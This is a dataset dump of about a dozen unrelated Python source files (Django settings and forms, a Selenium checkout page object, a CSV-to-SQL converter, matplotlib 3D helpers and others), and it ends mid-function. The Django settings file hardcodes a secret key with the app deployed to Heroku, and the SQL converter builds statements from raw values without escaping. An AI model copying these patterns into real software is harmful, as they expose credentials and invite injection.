blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 5
283
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
41
| license_type
stringclasses 2
values | repo_name
stringlengths 7
96
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 58
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 12.7k
662M
⌀ | star_events_count
int64 0
35.5k
| fork_events_count
int64 0
20.6k
| gha_license_id
stringclasses 11
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 43
values | src_encoding
stringclasses 9
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 7
5.88M
| extension
stringclasses 30
values | content
stringlengths 7
5.88M
| authors
sequencelengths 1
1
| author
stringlengths 0
73
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f9e85c3a39933df7478edef51d0e3d6b2c4b2f15 | 340b3f3a2472d39bc7418c0568adedff3f42f849 | /example/guard.py | 19c155f5ccae016398d0819b14dbd79b5c625b83 | [] | no_license | shen-will/py_guard | 206600a23595517e8ed1def58830e93c7eed78c7 | a1dd7743f241de15f2478ca3abeac59335584445 | refs/heads/master | 2020-09-10T23:22:45.063067 | 2019-11-15T07:05:54 | 2019-11-15T07:05:54 | 221,863,661 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,152 | py | import boot
import py2pyx
import os
import shutil
import logging
py2pyx.set_encode(boot.encode)
py2pyx.set_decode(boot.decode)
#project entry
entry = "app.py"
py_boot = "boot.py"
output_dir = "guard"
def clear_workspace():
if os.path.exists(output_dir):
for dirpath,dirs,filenames in os.walk(output_dir):
for name in filenames:
os.remove(os.path.join(dirpath,name))
else:
os.mkdir(output_dir)
pass
def build():
clear_workspace()
# project source excluce entry
project_src = []
for dirpath, dirnames, filenames in os.walk("./"):
for fname in filenames:
if not fname.endswith(".py") or fname == entry or \
fname == py_boot or fname == "guard.py" or fname == "setup.py":
continue
project_src.append(os.path.join(dirpath, fname))
logging.basicConfig(level=logging.DEBUG, format='%(levelname)s: %(message)s')
logging.info("start encode....")
for src in project_src:
if not src.endswith(".py"):
continue
logging.info(src)
pyc_path = src + "c"
if os.path.exists(pyc_path):
os.remove(pyc_path)
py2pyx.py2pyx(src)
pyc_guard = os.path.join(output_dir, os.path.basename(pyc_path))
if os.path.exists(pyc_path):
shutil.move(pyc_path, pyc_guard)
if not os.path.exists(pyc_guard):
logging.error(src + " encode fail")
exit(-1)
logging.info(py_boot)
py2pyx.boot_encode(py_boot)
pyc_boot_path = py_boot + 'c'
if not os.path.exists(pyc_boot_path):
logging.error(py_boot + ' encode fail')
exit(-1)
shutil.move(pyc_boot_path, os.path.join(output_dir, os.path.basename(pyc_boot_path)))
logging.info(entry)
shutil.copy(entry, os.path.join(output_dir, os.path.basename(entry)))
# logging.info("py_guard.so")
# shutil.copy("py_guard.so",os.path.join(output_dir,os.path.basename("py_guard.so")))
logging.info("[success! %d file encode to %s]" % (len(project_src), output_dir))
pass
if __name__ == "__main__":
build()
| [
"[email protected]"
] | |
a8cbd5304f49414fc009d39c58453e3125ea0347 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2162/60642/271978.py | 21491e3ebf8b02f3ffeb54854511ba826017221e | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 111 | py | nums = [float(i) for i in input().split()]
out = 1
for i in range(int(nums[1])):
out=out*nums[0]
print(out) | [
"[email protected]"
] | |
db25d011efbedfce01e05e234cc93421b560abb6 | a0fbf1cf0920c31dde56ee9376b5865abbe0a283 | /docs/conf.py | 15d2c8d49e380b40e0f9d78a4ec5ba70f87bdab9 | [
"BSD-3-Clause"
] | permissive | laurennk/cookiecutter | cb37e9dad3722dc7bcabd1f4686c2ce1f27a9675 | c1a03338ba6463d5e87a68ba980933bcab8fcd33 | refs/heads/master | 2020-07-04T04:28:34.014104 | 2019-08-13T19:14:30 | 2019-08-13T19:14:30 | 202,156,233 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,321 | py | # -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/stable/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# Incase the project was not installed
import os
import sys
sys.path.insert(0, os.path.abspath('..'))
import cookiecutter
# -- Project information -----------------------------------------------------
project = 'CookieCutter'
copyright = ("2019, Lauren. Project structure based on the "
"Computational Molecular Science Python Cookiecutter version 1.0")
author = 'Lauren'
# The short X.Y version
version = ''
# The full version, including alpha/beta/rc tags
release = ''
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autosummary',
'sphinx.ext.autodoc',
'sphinx.ext.mathjax',
'sphinx.ext.viewcode',
'sphinx.ext.napoleon',
'sphinx.ext.intersphinx',
'sphinx.ext.extlinks',
]
autosummary_generate = True
napoleon_google_docstring = False
napoleon_use_param = False
napoleon_use_ivar = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path .
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'default'
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'cookiecutterdoc'
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'cookiecutter.tex', 'CookieCutter Documentation',
'cookiecutter', 'manual'),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'cookiecutter', 'CookieCutter Documentation',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'cookiecutter', 'CookieCutter Documentation',
author, 'cookiecutter', 'A short description of the project.',
'Miscellaneous'),
]
# -- Extension configuration -------------------------------------------------
| [
"[email protected]"
] | |
e6783b8029425cead151f4e40dd3331e1ad9307d | cdcc82bcd10635ec315df766a036302e3614ecb2 | /src/page_obj/pages/Checkout.py | 1c19c3a774435284b88a4d67620b5a21c974ca28 | [] | no_license | casewebb/FullStory_Automation | 74f4f1a4e7340c3c4c5e9db6e09586b02ee6a25c | bbdd3aade94e459015121185ceee1c8be2d04c17 | refs/heads/master | 2023-08-18T13:31:52.758003 | 2021-09-24T14:56:53 | 2021-09-24T14:56:53 | 409,812,973 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,314 | py | from faker import Faker
from src.page_obj.Locators import Locator
from src.page_obj.pages.Base import BasePage
class CheckoutPage(BasePage):
PURCHASE_LINK = "Purchase"
BILLING_ADDRESS = "Billing Address"
SHIPPING_ADDRESS = "Shipping Address"
PAYMENT_DETAILS = "Payment Details"
SAME_AS_BILLING = "Same as billing address."
CONFIRM_CBX = "You sure you want this fruit?"
fake = Faker()
def fill_out_address(self, section):
name = self.fake.name().split()
address_1 = '{building_num} {street}'.format(building_num=self.fake.building_number(),
street=self.fake.street_name())
bill_ship = self.BILLING_ADDRESS if section.lower() == 'billing' else self.SHIPPING_ADDRESS
self.send_text_by_section_and_label(bill_ship, "First Name", name[0])
self.send_text_by_section_and_label(bill_ship, "Last Name", name[1])
self.send_text_by_section_and_label(bill_ship, "Address 1", address_1)
self.send_text_by_section_and_label(bill_ship, "Address 2", self.fake.secondary_address())
self.send_text_by_section_and_label(bill_ship, "City", self.fake.city())
self.send_text_by_section_and_label(bill_ship, "Zip Code", self.fake.postcode())
self.select_dropdown_by_section_and_label(bill_ship, "State", self.fake.state_abbr())
def set_same_as_billing_checked(self, checked):
ele = self.driver.find_element_by_xpath(Locator.checkbox_by_label.format(label_text=self.SAME_AS_BILLING))
if checked and not ele.is_selected():
ele.click()
elif not checked and ele.is_selected():
ele.click()
def fill_out_payment(self):
self.send_text_by_section_and_label(self.PAYMENT_DETAILS, "Credit Card Number", self.fake.credit_card_number())
self.send_text_by_section_and_label(self.PAYMENT_DETAILS, "Security Code",
self.fake.credit_card_security_code())
self.select_dropdown_by_section_label_count(self.PAYMENT_DETAILS, "Expiration", 1,
self.fake.month().lstrip('0'))
self.select_dropdown_by_index(self.PAYMENT_DETAILS, "Expiration", 2, 3)
self.click_checkbox_by_label(self.CONFIRM_CBX)
| [
"[email protected]"
] | |
41cc3b0a4dfcde97f3d1a8c8f12525bf7b174093 | 5e56afad7b7da0135576fec692990e202dac98dd | /FirstPro/FirstPro/items.py | ab15ab2d11ce160fddf1bae2bfa2a8fd39dfbce6 | [] | no_license | lxorz/ScrapyDemo_new | 33472b2b81ce0b0e1517f19bf61812bb9313f8be | 060eaeb2b1bb6cf84f0ea5ed7939293e7766022c | refs/heads/master | 2020-04-16T10:18:14.288003 | 2019-01-13T11:57:02 | 2019-01-13T11:57:02 | 165,499,317 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 281 | py | # -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class FirstproItem(scrapy.Item):
# define the fields for your item here like:
# name = scrapy.Field()
| [
"[email protected]"
] | |
3d2c91ab2682f88f418cd8c5c9049f64d7e4973e | 1e5bc206c760d6543768f835be0a112da45c84af | /flask/2.PackagedApp/PackagedApp.wsgi | d75d598b84c5e8aaa3dfaec1a9497b72c8a49915 | [] | no_license | msagautam/docker | 9efff85f6a15a874c0a06ae6479ba4c8d9d3960f | 03d1f6b2186e9286151fdfce9410d8d4185f0f68 | refs/heads/master | 2023-05-14T02:06:46.264398 | 2020-06-08T15:29:55 | 2020-06-08T15:29:55 | 263,859,509 | 0 | 1 | null | 2023-05-01T20:41:07 | 2020-05-14T08:34:39 | Python | UTF-8 | Python | false | false | 394 | wsgi | #!/usr/bin/python
import sys
import logging
logging.basicConfig(stream=sys.stderr)
sys.path.insert(0,"/var/www/")
# Virtual env activation
#activate_this = '/path/to/env/bin/activate_this.py'
#execfile(activate_this, dict(__file__=activate_this))
from PackagedApp import app as application
application.secret_key = 'your secret key. If you share your website, do NOT share it with this key.'
| [
"[email protected]"
] | |
bbdc0f983f3651518973629255273e7c51f671d5 | 82d6e248d6498f53455f9ccb40b6ff9667da8f2e | /Params/cv_params.py | a90d413f3fc604ca2eb926d871cecd0eef586906 | [] | no_license | marvinxu-free/data_analysis | 650ddf35443e66c395c8c503cacc328e547298a5 | 7a552959fd6272a54488c59091fa8b820c3f19ce | refs/heads/master | 2020-03-22T04:00:09.938423 | 2018-07-02T16:32:20 | 2018-07-02T16:32:20 | 139,466,395 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 434 | py | # -*- coding: utf-8 -*-
# Project: local-spark
# Author: chaoxu create this file
# Time: 2017/10/13
# Company : Maxent
# Email: [email protected]
cv_params = {
'pre_dispatch': '2*n_jobs',
'refit': True,
'scoring': 'roc_auc',
# 'scoring':'f1_macro',
# 'scoring':'average_precision',
# 'scoring':'accuracy',
# 'scoring':'recall',
'cv': 5,
'n_jobs': -1,
"iid": False,
'verbose': 0
}
| [
"[email protected]"
] | |
8d983a912308bcfc6136f04b18791bd0eea629bb | da56dd222cb165f70b021e26963e5faa744168c0 | /Inventory/settings.py | 4d05e8b35a044622c37339844091395cd5269840 | [] | no_license | mohankmn/congenial-train | 7c0558c351c50c91447d09ad2a305d3e78722492 | 8f3caaea28112567e4d6e59cbd8cdf1774c7f784 | refs/heads/master | 2023-03-03T03:42:08.598885 | 2021-02-17T11:47:30 | 2021-02-17T11:47:30 | 314,130,458 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,437 | py | """
Django settings for Inventory project.
Generated by 'django-admin startproject' using Django 3.1.3.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
import os
import django_heroku
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'yc##of9a8il-1r8yrd3+xf#+3sc8l&u(2_^qxwnf6eco4o_&6c'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
ALLOWED_HOSTS = ['invcontrolapp.herokuapp.com', 'localhost', '127.0.0.1']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'data',
'crispy_forms',
'register.apps.RegisterConfig',
'csvs'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'Inventory.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR,'templates')
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'Inventory.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
CRISPY_TEMPLATE_PACK = 'bootstrap4'
# Activate Django-Heroku.
django_heroku.settings(locals()) | [
"[email protected]"
] | |
86f8e74ca81e9e6f34963564d493aad09861aaa5 | d3b162461f129858fbc7f61aa45064bd5c3f7a4f | /old/image_convert.py | 211ae8a9bb524c40cc4356ce6e097765de0d9337 | [] | no_license | mikemeding/batch-convert-and-merge | 2f7523cb4f0db0e3ea40152fc2d3418bf10f0f9c | 49673389325d32126be0ddeb4a3a1f850b263e2b | refs/heads/master | 2021-07-11T19:44:24.108958 | 2021-02-28T23:38:38 | 2021-02-28T23:38:38 | 235,146,102 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 153 | py | # ./20.01/LeftPL/20.01_LeftPL_7_1.tif
import sys
import imagej
imgPath = str(sys.argv[1])
print('Converting: ' + str(sys.argv[1]))
ij = imagej.init()
| [
"[email protected]"
] | |
81ed3dcbff8edda8b54da97b7b5c12ded266b671 | a5a9b8da861ba4964802e554b2bb064f45802c09 | /data_generator/csv_details_to_sql.py | 09aca83f504ac56bc86689f10f7de2eb86070fd1 | [] | no_license | bantser/Lv_608.DB | ba9bff47f6adf063e4062a3e2c1fd0acf5741b35 | 83838255cf9533f5dddad096cdea37861e1931ec | refs/heads/main | 2023-06-27T15:28:03.286481 | 2021-07-19T08:04:31 | 2021-07-19T08:04:31 | 379,222,467 | 2 | 0 | null | 2021-06-22T20:44:39 | 2021-06-22T10:01:19 | null | UTF-8 | Python | false | false | 914 | py | import csv
inputFilename = "PurchaseOrderDetails.csv"
outputFilename = "PurchaseOrderDetails.sql"
tableName = 'PurchaseOrderDetails'
chunksize = 1000
openInFile = open(inputFilename, 'r')
openOutFile = open(outputFilename, 'w')
csvFile = csv.reader(openInFile)
header = next(csvFile)
headers = list(header)
headers_without_id = list(headers)[1:]
insert = f"INSERT INTO {tableName} ({', '.join(headers_without_id)}) VALUES"
openOutFile.write(insert + '\n')
cntr = 0
for row in csvFile:
values = row[1:]
if cntr < chunksize-1:
val_statement = f"({', '.join(values)}),"
openOutFile.write(val_statement + '\n')
cntr += 1
else:
val_statement = f"({', '.join(values)});"
openOutFile.write(val_statement + '\n')
openOutFile.write(insert + '\n')
cntr = 0
openInFile.close()
openOutFile.close()
print(f"Done! Saved in {outputFilename}") | [
"[email protected]"
] | |
c53617a9f877099d700dced03ddccbdc2430a98c | ac00003e67c7eb035c94741d058f751e5b3e7a94 | /askapp/forms.py | 5e7c99cbaa580b99c615ce81901af35a5c08823d | [
"Apache-2.0"
] | permissive | BanzaiTokyo/askapp | 6c0bdec6ed24b1e5fa856540dafe6295a2718b74 | 250dea680eafde81491492a84826d368a01bb8ed | refs/heads/master | 2023-08-17T05:57:40.790152 | 2021-04-08T18:54:20 | 2021-04-08T18:54:20 | 67,356,664 | 3 | 2 | Apache-2.0 | 2021-09-22T17:38:49 | 2016-09-04T16:42:00 | Python | UTF-8 | Python | false | false | 4,743 | py | import urllib.request
from snowpenguin.django.recaptcha2.fields import ReCaptchaField
from snowpenguin.django.recaptcha2.widgets import ReCaptchaWidget
from allauth.account.forms import SignupForm
from django.utils.translation import ugettext_lazy as _
from django import forms
from .models import Profile, Thread, Post
from askapp import settings
class RecaptchaRegistrationForm(SignupForm):
tos = forms.BooleanField(widget=forms.CheckboxInput,
label=_('I have read and agree to the Terms of Service'),
error_messages={'required': _("You must agree to the terms to register")})
captcha = ReCaptchaField(widget=ReCaptchaWidget())
@staticmethod
def is_email_blacklisted(email):
try:
sfs_url = f'http://api.stopforumspam.org/api?email={email}'
contents = urllib.request.urlopen(sfs_url).read()
return b'<appears>yes</appears>' in contents
except Exception:
return any([email.lower().endswith('@'+d) for d in settings.BLACKLISTED_DOMAINS])
def save(self, request):
user = super().save(request)
email = self.cleaned_data.get("email")
if email and self.is_email_blacklisted(email):
user.is_active = False
user.save()
return user
class ProfileForm(forms.ModelForm):
is_active = forms.BooleanField(required=False)
class Meta:
model = Profile
fields = ('avatar', 'country', 'city', 'about')
widgets = {
'country': forms.Select(attrs={'class': 'form-control'}),
'city': forms.TextInput(attrs={'class': 'form-control', 'placeholder': _('Enter your city')}),
'about': forms.Textarea(attrs={'class': 'form-control', 'rows': 3}),
}
class ConstanceClearableFileInput(forms.widgets.ClearableFileInput):
template_name = 'admin/askapp/constance_file_input.html'
def is_initial(self, value):
return bool(value)
class ThreadForm(forms.ModelForm):
class Meta:
model = Thread
fields = ('thread_type', 'original', 'link', 'title', 'text', 'tags', 'image')
widgets = {
'original': forms.TextInput(),
'image': forms.widgets.ClearableFileInput()
}
error_messages = {
'original': {
'invalid_choice': _('This thread is not found'),
},
}
def __init__(self, user, *args, **kwargs):
super(ThreadForm, self).__init__(*args, **kwargs)
if self.instance and not self.instance.id:
self.instance.user = user
if not user.is_staff:
self.fields['thread_type'].choices = (
tt for tt in Thread.TYPES_OF_THREAD
if tt[0] not in [Thread.DUPLICATE, Thread.VIDEOSTREAM]
)
elif not user.is_staff:
self.fields.pop('thread_type')
def clean_original(self):
if self.instance and self.instance == self.cleaned_data.get('original'):
raise forms.fields.ValidationError('Cannot reference itself as a duplicate')
return self.cleaned_data.get('original')
def clean(self):
cleaned_data = super(ThreadForm, self).clean()
link = cleaned_data.get("link")
thread_type = cleaned_data.get("thread_type")
#if thread_type and self.initial.get('thread_type', thread_type) != thread_type and not self.user.is_staff and not self.has_error('title'):
# self.add_error('title', 'You are not allowed to change the thread type')
if thread_type in Thread.TYPES_WITH_LINK and not self.has_error('link'):
if not link:
msg = _("This field is required")
self.add_error('link', msg)
else:
youtube_info = Thread(link=link).parse_youtube_url()
if youtube_info:
exists = Thread.objects.filter(link__contains=youtube_info['id']).exclude(id=self.instance.id)
if len(exists):
msg = _("Sorry, someone has already posted this video")
self.add_error('link', msg)
elif thread_type == Thread.YOUTUBE:
msg = _("This is not a Youtube URL")
self.add_error('link', msg)
elif self.has_error('link') and thread_type not in Thread.TYPES_WITH_LINK:
del self.errors['link']
class ReplyForm(forms.ModelForm):
is_answer = forms.BooleanField(required=False)
class Meta:
model = Post
fields = ('text', 'is_answer')
widgets = {
'text': forms.Textarea(attrs={'class': 'form-control', 'rows': 5}),
}
| [
"[email protected]"
] | |
af39e9a770317784ace4420a98689ed84357f0d4 | d0b49b4072b09c59f81e25b80bad6f2535d839b5 | /day_1_5/day_2.py | 2b8c38c96927069002fc853d3855ad0ab0d10d79 | [] | no_license | Official-BlackHat13/100_days_of_python | 3aa9c52617cd50addc2d2b8b7222b93080ffab6c | 94cbf52df8e5712d1bdf7b2890568dfa20fe92df | refs/heads/master | 2023-09-04T05:08:24.867559 | 2021-10-24T14:43:21 | 2021-10-24T14:43:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 378 | py | print('welcome to the tim calculator!')
bill = input('bill: ')
tip_percentage = input('percentage of the tip you want to give: ')
persons = input('number of people who eated: ')
tip = (float(bill) * float(tip_percentage)) / 100
total_bill = (float(bill) + float(tip))
bill_per_person = float(total_bill) / float(persons)
print('each person should pay ' + str(bill_per_person))
| [
"[email protected]"
] | |
552cecee22760fca63c793185a2c7fc54fd727a3 | 3980749637737b3e1cd589f7a4e8733eaa5f2cf9 | /neuroplotlib/utils.py | 17839aba4a4ca0089d9b90f4dbb882097ac02299 | [] | no_license | alejoe91/neuroplotlib | 7200664872a04ed0173ca0d337e12234c4c5692e | 9ad8d8e23850cd50ad0368f0f19acf2b48b87f5c | refs/heads/master | 2023-08-02T07:22:10.658339 | 2021-09-27T09:40:10 | 2021-09-27T09:40:10 | 118,170,362 | 3 | 1 | null | 2021-09-27T09:40:10 | 2018-01-19T19:43:43 | Python | UTF-8 | Python | false | false | 11,068 | py | import numpy as np
import math
from mpl_toolkits.mplot3d import art3d
from matplotlib import colors as mpl_colors
from mpl_toolkits.mplot3d.art3d import Poly3DCollection
def make_patch_3d(pathpatch, rot_axis, angle, z=0):
"""
Transforms a 2D Patch to a 3D patch using the given normal vector.
The patch is projected into they XY plane, rotated about the origin
and finally translated by z.
"""
path = pathpatch.get_path() # Get the path and the associated transform
trans = pathpatch.get_patch_transform()
path = trans.transform_path(path) # Apply the transform
pathpatch.__class__ = art3d.PathPatch3D # Change the class
pathpatch._code3d = path.codes # Copy the codes
pathpatch._facecolor3d = pathpatch.get_facecolor # Get the face color
verts = path.vertices # Get the vertices in 2D
M = _rotation_matrix(rot_axis, angle) # Get the rotation matrix
pathpatch._segment3d = np.array([np.dot(M, (x, y, 0)) + (0, 0, z) for x, y in verts])
def pathpatch_2d_to_3d(pathpatch, z=0, normal='z'):
"""
Transforms a 2D Patch to a 3D patch using the given normal vector.
The patch is projected into they XY plane, rotated about the origin
and finally translated by z.
"""
if type(normal) is str: # Translate strings to normal vectors
index = "xyz".index(normal)
normal = np.roll((1.0, 0, 0), index)
normal /= np.linalg.norm(normal) # Make sure the vector is normalised
path = pathpatch.get_path() # Get the path and the associated transform
trans = pathpatch.get_patch_transform()
path = trans.transform_path(path) # Apply the transform
pathpatch.__class__ = art3d.PathPatch3D # Change the class
pathpatch._code3d = path.codes # Copy the codes
pathpatch._facecolor3d = pathpatch.get_facecolor # Get the face color
verts = path.vertices # Get the vertices in 2D
d = np.cross(normal, (0, 0, 1)) # Obtain the rotation vector
M = _rotation_matrix_sin(d) # Get the rotation matrix
pathpatch._segment3d = np.array([np.dot(M, (x, y, 0)) + (0, 0, z) for x, y in verts])
def pathpatch_translate(pathpatch, delta):
"""
Translates the 3D pathpatch by the amount delta.
"""
pathpatch._segment3d += delta
def get_polygons_for_cylinder(pos_start, direction, length, radius, n_points, facecolor='b', edgecolor='k', alpha=1.,
lw=0.):
"""
Returns polygons from a cylinder
Parameters
----------
pos_start: np.array
3D position of the bottom of the cylinder
direction: np.array
Cylinder direction
length: float
Length of the cylinder
radius: float
Radius of the cylinder
n_points: int
Number of points for polygons
facecolor: Matplolib color
Color of the faces
edgecolor: Matplolib color
Color of the edges
alpha: float
Alpha value
lw: float
Linewidth of the edges
Returns
-------
collection: Matplotlib rd cllection
Collection of polygons making up the cylinder
"""
n_points = int(n_points)
x, y, z = _cylinder(pos_start,
direction,
length,
radius,
n_points)
alpha_tup = alpha,
edge_col = mpl_colors.to_rgb(edgecolor) + alpha_tup
face_col = mpl_colors.to_rgb(facecolor) + alpha_tup
theta_ring = np.linspace(0., np.pi * 2., n_points)
verts_hull = []
for idx_theta, crt_theta in enumerate(theta_ring):
if idx_theta <= theta_ring.size - 2:
x_verts = [x[idx_theta],
x[idx_theta + 1],
x[idx_theta + 1 + theta_ring.size],
x[idx_theta + theta_ring.size]]
y_verts = [y[idx_theta],
y[idx_theta + 1],
y[idx_theta + 1 + theta_ring.size],
y[idx_theta + theta_ring.size]]
z_verts = [z[idx_theta],
z[idx_theta + 1],
z[idx_theta + 1 + theta_ring.size],
z[idx_theta + theta_ring.size]]
verts_hull.append(zip(x_verts, y_verts, z_verts))
poly3d_hull = []
for crt_vert in verts_hull:
cyl = Poly3DCollection([list(crt_vert)], linewidths=lw)
cyl.set_facecolor(face_col)
cyl.set_edgecolor(edge_col)
cyl.set_alpha(alpha)
poly3d_hull.append(cyl)
# draw lower lid
x_verts = x[0:theta_ring.size - 1]
y_verts = y[0:theta_ring.size - 1]
z_verts = z[0:theta_ring.size - 1]
verts_lowerlid = [list(zip(x_verts, y_verts, z_verts))]
poly3ed_lowerlid = Poly3DCollection(verts_lowerlid, linewidths=lw, zorder=1)
poly3ed_lowerlid.set_facecolor(face_col)
poly3ed_lowerlid.set_edgecolor(edge_col)
poly3ed_lowerlid.set_alpha(alpha)
# draw upper lid
x_verts = x[theta_ring.size:theta_ring.size * 2 - 1]
y_verts = y[theta_ring.size:theta_ring.size * 2 - 1]
z_verts = z[theta_ring.size:theta_ring.size * 2 - 1]
verts_upperlid = [list(zip(x_verts, y_verts, z_verts))]
poly3ed_upperlid = Poly3DCollection(verts_upperlid, linewidths=lw, zorder=1)
poly3ed_upperlid.set_facecolor(face_col)
poly3ed_upperlid.set_edgecolor(edge_col)
poly3ed_upperlid.set_alpha(alpha)
return_col = poly3d_hull
return_col.append(poly3ed_lowerlid)
return_col.append(poly3ed_upperlid)
return return_col
##### from plotting convention ######
def mark_subplots(axes, letters='ABCDEFGHIJKLMNOPQRSTUVWXYZ', xpos=-0.05, ypos=1.05, fs=50):
"""
Marks axes with letters
Parameters
----------
axes: list
List of Matplotlib axes to mark
letters: list
List of sequential characters (default alphabet)
xpos: float
x-position with respect to each axis (default -0.05)
ypos: float
y-position with respect to each axis (default 1.05)
fs: int
Fontsize of the letters
"""
if not type(axes) is list:
axes = [axes]
for idx, ax in enumerate(axes):
# Axes3d
try:
ax.text2D(xpos, ypos, letters[idx].capitalize(),
horizontalalignment='center',
verticalalignment='center',
fontweight='demibold',
fontsize=fs,
transform=ax.transAxes)
except AttributeError:
ax.text(xpos, ypos, letters[idx].capitalize(),
horizontalalignment='center',
